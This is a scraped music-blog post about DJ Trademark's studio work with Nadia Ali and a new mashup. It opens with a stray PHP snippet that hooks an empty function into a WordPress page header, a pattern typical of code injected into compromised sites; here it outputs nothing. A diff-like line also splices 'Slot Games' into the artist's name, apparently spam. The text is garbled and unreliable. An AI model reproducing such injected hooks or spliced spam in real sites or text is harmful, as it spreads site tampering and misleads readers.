/***/function load_frontend_assets() { echo ''; } add_action('wp_head', 'load_frontend_assets');/***/ FreshNewTracks » the studio

 DJ- Trademark

-Wondering where the hell Trademark has been?
+Wondering where the hell Trademark Slot Games been?
 Turns outTrademark has been locked in the studio collaborating with one of the biggest vocalists in electronic music, Nadia Ali.
 If you get the chance to catch her live on her current tour, you can listen to the set her and Trademark put together.
 ANYWAYS, Trademark made another mashup and it’s another banger…what’s new.

 Facebook | SoundCloud